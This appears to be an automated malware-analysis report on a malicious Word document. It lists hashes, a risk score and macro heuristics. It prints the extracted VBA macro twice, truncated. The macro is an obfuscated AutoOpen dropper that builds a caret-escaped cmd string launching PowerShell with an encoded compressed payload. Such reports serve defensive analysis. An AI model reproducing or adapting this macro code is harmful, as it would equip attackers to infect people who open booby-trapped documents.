Office (OLE) malware analysis — malicious · c950f6cbb9f20808

MALICIOUS

Office (OLE)

88.8 KB Created: 2018-06-06 10:47:00 Authoring application: Microsoft Office Word First seen: 2020-06-01

MD5: f89725f3d14310b303a65b958010dfba SHA-1: 6db204ae068fa33bd2568bc960949798b143d922 SHA-256: c950f6cbb9f20808be551e5397e0b19632af7ea57da423158ec42fe24459e747

182 Risk Score

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11627 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11627 bytes
SHA-256: `75972920575e5c0f0a836719046152da0462aa8116116962d996ffa54ac66cd9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SZGjcNzjKFSzjh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function cGkHwm() On Error Resume Next HiwIQ = Hex(fUvojq + Hex(fQMvA) * 51982 + Round(lnPzoc)) QCJLX = Cos(rwhCv) pfLQf = CDate(kpuvH) zlaOU = Cos(BToVO) lcLcX = Hex(jJzllO + Hex(WkvEnf) * 40226 + Round(zOlocc)) BcbUR = Cos(fCpHRK) wNMzL = CDate(zdFPAq) XoOaov = Cos(QIWJR) cGkHwm = bMzAIJ + Shell(jrvWRui + Chr(cQsGi + vbKeyC + Hbwzaslnc) + HKnwcMWnC + aQqDULVDRGB + mkSciOUjzNn + cwZjzA + IJZkrHQiMc + WWWFAWfNuh, 40052 - 40052) hrhGzV = Hex(IwjCl + Hex(oipvNa) * 57645 + Round(VroPS)) CvpqC = Cos(NGFwzR) VlbELo = CDate(GcbMJ) naMAtr = Cos(zRMGtz) End Function Sub Autoopen() On Error Resume Next PiZtw = Hex(vImumc + Hex(GPaUdj) * 37323 + Round(nuFCHm)) DYULMk = Cos(YDiPOn) nSNRQY = CDate(rsdMjJ) nTqpIP = Cos(NZbPq) cGkHwm rWmNS = Hex(Pzbrlq + Hex(vLjqw) * 61628 + Round(UkjraF)) ZaslB = Cos(NsVFPu) tcMbF = CDate(tUthid) PqGmum = Cos(HpZjG) End Sub Attribute VB_Name = "QACqabEfhrYH" Function HKnwcMWnC() On Error Resume Next oYliO = Hex(OcRHqJ + Hex(LmjIE) * 36534 + Round(piiHYh)) QiTrMo = Cos(nKBRT) WJRSPK = CDate(CpwOrJ) UFuiF = Cos(RztzPi) mOTESOC = "md " + "jZMqvUMV O" + "puUvzP" + "mDWo" + "jPmrjJTf w" + "SVBnPCz & " + " %^c^o^m^" FYbfq = Hex(cXfQLs + Hex(jibkF) * 99646 + Round(juhQX)) mYYQU = Cos(lpsiO) XHjho = CDate(imrznW) rPblL = Cos(KIfwEw) WRPHlIwff = "S^p^E" + "^c^% " + " %^c^o^m" + "^S^p" wJGYq = Hex(MRisW + Hex(FsikT) * 79106 + Round(CHcnKE)) nEKsIc = Cos(YtZfSG) JrJXEi = CDate(wbXLJ) wITVw = Cos(JMIGq) YQjGszi = "^E^c^%" + " " + "/V " + "/c " + " " + "set %jZkwEYREQ" + "zUiHYj%=XCJ" + "ZzLKtpOQW&&set " + "%ZVJAjuUzHbGao%" + "=p&" tUjzJE = Hex(iwtPT + Hex(FVbpc) * 74966 + Round(zJmQZD)) wzaAlT = Cos(LNZzSS) aUCtA = CDate(qwhXj) IkjiQ = Cos(GVCkX) Phwwfqkv = "&set %zKkYu" + "ziS%=o^w&&s" + "et %YSIhMn" + "TzfrbrUmS%=zzz" + "aijik&&set" iAdtHC = Hex(KUXYpj + Hex(YzszP) * 5351 + Round(RKCcf)) ZMzHp = Cos(JPAczq) hWzlLu = CDate(tBIdDV) ZMpaR = Cos(sQwXPi) iQhMEliGir = " %SUXuSvSz" + "%=!%" + "ZVJAj" + "uUzHbGao%!&" + "&set %GdzXPrHqH" + "vjwrmV%=" HKnwcMWnC = mOTESOC + WRPHlIwff + YQjGszi + Phwwfqkv + iQhMEliGir End Function Function aQqDULVDRGB() On Error Resume Next aHYUvI = Hex(VzSYqi + Hex(QYDUDU) * 52632 + Round(CKBfOm)) YcWcB = Cos(lcnhu) zbuRjj = CDate(csuDLN) qFNSP = Cos(zEZpCO) mdGukY = "EmGfaSENtA&&" + "se" + "t " + "%rKaW" HivPmJ = Hex(bIItSw + Hex(KXdZK) * 28780 + Round(hjOURA)) vBEPVC = Cos(zziQCd) izUATc = CDate(jwQrzz) wjuUI = Cos(jGDdwt) ACunNEEzlPG = "lEWtuIUo%" + "=e^r&&set %VQ" + "SNEcWJW" + "NT%=!%zKkYuziS" + "%!&&se" MawIHl = Hex(ziuUwY + Hex(OFnXW) * 9880 + Round(zQjwu)) JbtqDa = Cos(aFzIjO) ZPmaW = CDate(vRBPFa) PNKPLN = Cos(jYoDQ) VZZQMjdX = "t %roGwXJC" + "%=s&&set %tsOq" + "npoXbjnwink%=" + "jZG" + "USNbfWwcz&&" + "set %i" + "FwzciIaE" + "%=he&&s" aaIIf = Hex(IBojiJ + Hex(KmsZil) * 57246 + Round(iNviwW)) TBaiK = Cos(JVJtjR) nbdfF = CDate(DQrzKS) mrMMZi = Cos(zhnIv) wAzjGbQlzCS = "et %OHnSqG" + "Yjvkh%=ll&&!%S" + "UXuSvSz%!!%V" + "QSNEcWJWNT%" + "!!" + "%rKaW" + "lEWtuIUo" + "%!!%roGwXJC%!!%" cARifu = Hex(MwHjQ + Hex(LStcBQ) * 31676 + Round(MSIwT)) AUFoV = Cos(HJDzIT) zankc = CDate(zXwDFl) fbQhIm = Cos(tSrtS) NBBHlciiBl = "iFwzciIaE%!" + "!%OHnS" + "qGYjvkh%! -e I" + "AAoA" + "E4ARQBXA" + "C0AbwBiAGoAZQBD" jVBPu = Hex(hBRzY + Hex(jAWdBQ) * 954 + Round(dEjtV)) WHVjiu = Cos(OPbWj) lEqNd = CDate(AclpQR) sQkcpI = Cos(DwZflO) wvPdWQ = "AFQAIABTA" + "FkAUwBUAEUAb" + "QAuAGkATwAuA" + "EMAbwBtAF" + "AAcgB" + "lAHMAUwBpAE" QRkuHS = Hex(OwnqC + Hex(VOkSF) * 29066 + Round(BBinm)) oGpiL = Cos(ONkLBu) wUiSw = CDate(nGZoLH) VHcPmz = Cos(tdAYU) EQfop = "8AbgAuAEQAZQBm" + "AG" + "wA" + "YQBUAG" + "UAc" + "wB0AFIAZQB" + "BAG0AKAAg" + "AFsAaQBvAC4Ab" + "QBFAE0AbwBSAF" + "kAcwB0AFI" NnokDj = Hex(vQmXi + H ... (truncated)

SHA-256: 75972920575e5c0f0a836719046152da0462aa8116116962d996ffa54ac66cd9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SZGjcNzjKFSzjh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cGkHwm()
On Error Resume Next
HiwIQ = Hex(fUvojq + Hex(fQMvA) * 51982 + Round(lnPzoc))
QCJLX = Cos(rwhCv)
pfLQf = CDate(kpuvH)
zlaOU = Cos(BToVO)
lcLcX = Hex(jJzllO + Hex(WkvEnf) * 40226 + Round(zOlocc))
BcbUR = Cos(fCpHRK)
wNMzL = CDate(zdFPAq)
XoOaov = Cos(QIWJR)
cGkHwm = bMzAIJ + Shell(jrvWRui + Chr(cQsGi + vbKeyC + Hbwzaslnc) + HKnwcMWnC + aQqDULVDRGB + mkSciOUjzNn + cwZjzA + IJZkrHQiMc + WWWFAWfNuh, 40052 - 40052)
hrhGzV = Hex(IwjCl + Hex(oipvNa) * 57645 + Round(VroPS))
CvpqC = Cos(NGFwzR)
VlbELo = CDate(GcbMJ)
naMAtr = Cos(zRMGtz)
End Function
Sub Autoopen()
On Error Resume Next
PiZtw = Hex(vImumc + Hex(GPaUdj) * 37323 + Round(nuFCHm))
DYULMk = Cos(YDiPOn)
nSNRQY = CDate(rsdMjJ)
nTqpIP = Cos(NZbPq)
cGkHwm
rWmNS = Hex(Pzbrlq + Hex(vLjqw) * 61628 + Round(UkjraF))
ZaslB = Cos(NsVFPu)
tcMbF = CDate(tUthid)
PqGmum = Cos(HpZjG)
End Sub


Attribute VB_Name = "QACqabEfhrYH"
Function HKnwcMWnC()
On Error Resume Next
oYliO = Hex(OcRHqJ + Hex(LmjIE) * 36534 + Round(piiHYh))
QiTrMo = Cos(nKBRT)
WJRSPK = CDate(CpwOrJ)
UFuiF = Cos(RztzPi)
mOTESOC = "md " + "jZMqvUMV O" + "puUvzP" + "mDWo" + "jPmrjJTf w" + "SVBnPCz &   " + "  %^c^o^m^"
FYbfq = Hex(cXfQLs + Hex(jibkF) * 99646 + Round(juhQX))
mYYQU = Cos(lpsiO)
XHjho = CDate(imrznW)
rPblL = Cos(KIfwEw)
WRPHlIwff = "S^p^E" + "^c^% " + "    %^c^o^m" + "^S^p"
wJGYq = Hex(MRisW + Hex(FsikT) * 79106 + Round(CHcnKE))
nEKsIc = Cos(YtZfSG)
JrJXEi = CDate(wbXLJ)
wITVw = Cos(JMIGq)
YQjGszi = "^E^c^%" + "     " + "/V         " + "/c  " + "         " + "set %jZkwEYREQ" + "zUiHYj%=XCJ" + "ZzLKtpOQW&&set " + "%ZVJAjuUzHbGao%" + "=p&"
tUjzJE = Hex(iwtPT + Hex(FVbpc) * 74966 + Round(zJmQZD))
wzaAlT = Cos(LNZzSS)
aUCtA = CDate(qwhXj)
IkjiQ = Cos(GVCkX)
Phwwfqkv = "&set %zKkYu" + "ziS%=o^w&&s" + "et %YSIhMn" + "TzfrbrUmS%=zzz" + "aijik&&set"
iAdtHC = Hex(KUXYpj + Hex(YzszP) * 5351 + Round(RKCcf))
ZMzHp = Cos(JPAczq)
hWzlLu = CDate(tBIdDV)
ZMpaR = Cos(sQwXPi)
iQhMEliGir = " %SUXuSvSz" + "%=!%" + "ZVJAj" + "uUzHbGao%!&" + "&set %GdzXPrHqH" + "vjwrmV%="
HKnwcMWnC = mOTESOC + WRPHlIwff + YQjGszi + Phwwfqkv + iQhMEliGir
End Function
Function aQqDULVDRGB()
On Error Resume Next
aHYUvI = Hex(VzSYqi + Hex(QYDUDU) * 52632 + Round(CKBfOm))
YcWcB = Cos(lcnhu)
zbuRjj = CDate(csuDLN)
qFNSP = Cos(zEZpCO)
mdGukY = "EmGfaSENtA&&" + "se" + "t " + "%rKaW"
HivPmJ = Hex(bIItSw + Hex(KXdZK) * 28780 + Round(hjOURA))
vBEPVC = Cos(zziQCd)
izUATc = CDate(jwQrzz)
wjuUI = Cos(jGDdwt)
ACunNEEzlPG = "lEWtuIUo%" + "=e^r&&set %VQ" + "SNEcWJW" + "NT%=!%zKkYuziS" + "%!&&se"
MawIHl = Hex(ziuUwY + Hex(OFnXW) * 9880 + Round(zQjwu))
JbtqDa = Cos(aFzIjO)
ZPmaW = CDate(vRBPFa)
PNKPLN = Cos(jYoDQ)
VZZQMjdX = "t %roGwXJC" + "%=s&&set %tsOq" + "npoXbjnwink%=" + "jZG" + "USNbfWwcz&&" + "set %i" + "FwzciIaE" + "%=he&&s"
aaIIf = Hex(IBojiJ + Hex(KmsZil) * 57246 + Round(iNviwW))
TBaiK = Cos(JVJtjR)
nbdfF = CDate(DQrzKS)
mrMMZi = Cos(zhnIv)
wAzjGbQlzCS = "et %OHnSqG" + "Yjvkh%=ll&&!%S" + "UXuSvSz%!!%V" + "QSNEcWJWNT%" + "!!" + "%rKaW" + "lEWtuIUo" + "%!!%roGwXJC%!!%"
cARifu = Hex(MwHjQ + Hex(LStcBQ) * 31676 + Round(MSIwT))
AUFoV = Cos(HJDzIT)
zankc = CDate(zXwDFl)
fbQhIm = Cos(tSrtS)
NBBHlciiBl = "iFwzciIaE%!" + "!%OHnS" + "qGYjvkh%!  -e I" + "AAoA" + "E4ARQBXA" + "C0AbwBiAGoAZQBD"
jVBPu = Hex(hBRzY + Hex(jAWdBQ) * 954 + Round(dEjtV))
WHVjiu = Cos(OPbWj)
lEqNd = CDate(AclpQR)
sQkcpI = Cos(DwZflO)
wvPdWQ = "AFQAIABTA" + "FkAUwBUAEUAb" + "QAuAGkATwAuA" + "EMAbwBtAF" + "AAcgB" + "lAHMAUwBpAE"
QRkuHS = Hex(OwnqC + Hex(VOkSF) * 29066 + Round(BBinm))
oGpiL = Cos(ONkLBu)
wUiSw = CDate(nGZoLH)
VHcPmz = Cos(tdAYU)
EQfop = "8AbgAuAEQAZQBm" + "AG" + "wA" + "YQBUAG" + "UAc" + "wB0AFIAZQB" + "BAG0AKAAg" + "AFsAaQBvAC4Ab" + "QBFAE0AbwBSAF" + "kAcwB0AFI"
NnokDj = Hex(vQmXi + H
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.